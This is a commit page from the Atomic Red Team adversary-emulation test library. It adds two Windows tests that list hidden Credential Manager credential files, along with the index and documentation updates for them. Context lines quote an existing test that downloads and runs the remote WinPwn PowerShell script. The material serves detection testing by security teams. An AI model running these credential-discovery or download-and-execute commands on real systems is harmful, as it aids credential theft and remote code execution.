security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2024-07-12 14:59:56 +00:00
parent 7c51b76bcd
commit fd2d2a148d
12 changed files with 136 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
README.md
+1 -1
View File
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1599-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1601-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+2
View File
@@ -1571,6 +1571,8 @@ credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,13,List Credential Files via PowerShell,0d4f2281-f720-4572-adc8-d5bb1618affe,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List Credential Files via Command Prompt,b0cdacf6-8949-4ffe-9274-a9643a788e55,command_prompt
credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1571 credential-access T1552.001 Unsecured Credentials: Credentials In Files 10 WinPwn - passhunt 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797 powershell
1572 credential-access T1552.001 Unsecured Credentials: Credentials In Files 11 WinPwn - SessionGopher c9dc9de3-f961-4284-bd2d-f959c9f9fda5 powershell
1573 credential-access T1552.001 Unsecured Credentials: Credentials In Files 12 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials aaa87b0e-5232-4649-ae5c-f1724a4b2798 powershell
1574 credential-access T1552.001 Unsecured Credentials: Credentials In Files 13 List Credential Files via PowerShell 0d4f2281-f720-4572-adc8-d5bb1618affe powershell
1575 credential-access T1552.001 Unsecured Credentials: Credentials In Files 14 List Credential Files via Command Prompt b0cdacf6-8949-4ffe-9274-a9643a788e55 command_prompt
1576 credential-access T1528 Steal Application Access Token 1 Azure - Dump All Azure Key Vaults with Microburst 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea powershell
1577 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
1578 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+2
View File
@@ -1043,6 +1043,8 @@ credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,13,List Credential Files via PowerShell,0d4f2281-f720-4572-adc8-d5bb1618affe,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List Credential Files via Command Prompt,b0cdacf6-8949-4ffe-9274-a9643a788e55,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1043 credential-access T1552.001 Unsecured Credentials: Credentials In Files 10 WinPwn - passhunt 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797 powershell
1044 credential-access T1552.001 Unsecured Credentials: Credentials In Files 11 WinPwn - SessionGopher c9dc9de3-f961-4284-bd2d-f959c9f9fda5 powershell
1045 credential-access T1552.001 Unsecured Credentials: Credentials In Files 12 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials aaa87b0e-5232-4649-ae5c-f1724a4b2798 powershell
1046 credential-access T1552.001 Unsecured Credentials: Credentials In Files 13 List Credential Files via PowerShell 0d4f2281-f720-4572-adc8-d5bb1618affe powershell
1047 credential-access T1552.001 Unsecured Credentials: Credentials In Files 14 List Credential Files via Command Prompt b0cdacf6-8949-4ffe-9274-a9643a788e55 command_prompt
1048 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
1049 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
1050 credential-access T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
atomics/Indexes/Indexes-Markdown/index.md
+2
View File
@@ -2182,6 +2182,8 @@
- Atomic Test #10: WinPwn - passhunt [windows]
- Atomic Test #11: WinPwn - SessionGopher [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- Atomic Test #13: List Credential Files via PowerShell [windows]
- Atomic Test #14: List Credential Files via Command Prompt [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1528 Steal Application Access Token](../../T1528/T1528.md)
- Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
atomics/Indexes/Indexes-Markdown/windows-index.md
+2
View File
@@ -1512,6 +1512,8 @@
- Atomic Test #10: WinPwn - passhunt [windows]
- Atomic Test #11: WinPwn - SessionGopher [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- Atomic Test #13: List Credential Files via PowerShell [windows]
- Atomic Test #14: List Credential Files via Command Prompt [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
atomics/Indexes/index.yaml
+29
View File
@@ -92977,6 +92977,35 @@ credential-access:
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
-consoleoutput -noninteractive "
name: powershell
- name: List Credential Files via PowerShell
auto_generated_guid: 0d4f2281-f720-4572-adc8-d5bb1618affe
description: 'Via PowerShell,list files where credentials are stored in Windows
Credential Manager
'
supported_platforms:
- windows
executor:
command: |
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
name: powershell
elevation_required: true
- name: List Credential Files via Command Prompt
auto_generated_guid: b0cdacf6-8949-4ffe-9274-a9643a788e55
description: 'Via Command Prompt,list files where credentials are stored in
Windows Credential Manager
'
supported_platforms:
- windows
executor:
command: |
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
name: command_prompt
elevation_required: true
T1606.001:
technique:
modified: '2023-09-19T21:25:10.511Z'
atomics/Indexes/windows-index.yaml
+29
View File
@@ -76181,6 +76181,35 @@ credential-access:
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
-consoleoutput -noninteractive "
name: powershell
- name: List Credential Files via PowerShell
auto_generated_guid: 0d4f2281-f720-4572-adc8-d5bb1618affe
description: 'Via PowerShell,list files where credentials are stored in Windows
Credential Manager
'
supported_platforms:
- windows
executor:
command: |
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
name: powershell
elevation_required: true
- name: List Credential Files via Command Prompt
auto_generated_guid: b0cdacf6-8949-4ffe-9274-a9643a788e55
description: 'Via Command Prompt,list files where credentials are stored in
Windows Credential Manager
'
supported_platforms:
- windows
executor:
command: |
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
name: command_prompt
elevation_required: true
T1606.001:
technique:
modified: '2023-09-19T21:25:10.511Z'
atomics/T1552.001/T1552.001.md
+63
View File
@@ -32,6 +32,10 @@ In cloud and/or containerized environments, authenticated user and service accou
- [Atomic Test #12 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials](#atomic-test-12---winpwn---loot-local-credentials---aws-microsoft-azure-and-google-compute-credentials)
- [Atomic Test #13 - List Credential Files via PowerShell](#atomic-test-13---list-credential-files-via-powershell)
- [Atomic Test #14 - List Credential Files via Command Prompt](#atomic-test-14---list-credential-files-via-command-prompt)
<br/>
@@ -409,4 +413,63 @@ SharpCloud -consoleoutput -noninteractive
<br/>
<br/>
## Atomic Test #13 - List Credential Files via PowerShell
Via PowerShell,list files where credentials are stored in Windows Credential Manager
**Supported Platforms:** Windows
**auto_generated_guid:** 0d4f2281-f720-4572-adc8-d5bb1618affe
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
```
<br/>
<br/>
## Atomic Test #14 - List Credential Files via Command Prompt
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
**Supported Platforms:** Windows
**auto_generated_guid:** b0cdacf6-8949-4ffe-9274-a9643a788e55
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
```
<br/>
atomics/T1552.001/T1552.001.yaml
+2
View File
@@ -163,6 +163,7 @@ atomic_tests:
SharpCloud -consoleoutput -noninteractive
name: powershell
- name: List Credential Files via PowerShell
auto_generated_guid: 0d4f2281-f720-4572-adc8-d5bb1618affe
description: |
Via PowerShell,list files where credentials are stored in Windows Credential Manager
supported_platforms:
@@ -176,6 +177,7 @@ atomic_tests:
name: powershell
elevation_required: true
- name: List Credential Files via Command Prompt
auto_generated_guid: b0cdacf6-8949-4ffe-9274-a9643a788e55
description: |
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
supported_platforms:
atomics/used_guids.txt
+2
View File
@@ -1638,3 +1638,5 @@ fc369906-90c7-4a15-86fd-d37da624dde6
e672a340-a933-447c-954c-d68db38a09b1
6fb4c4c5-f949-4fd2-8af5-ddbc61595223
5a496325-0115-4274-8eb9-755b649ad0fb
0d4f2281-f720-4572-adc8-d5bb1618affe
b0cdacf6-8949-4ffe-9274-a9643a788e55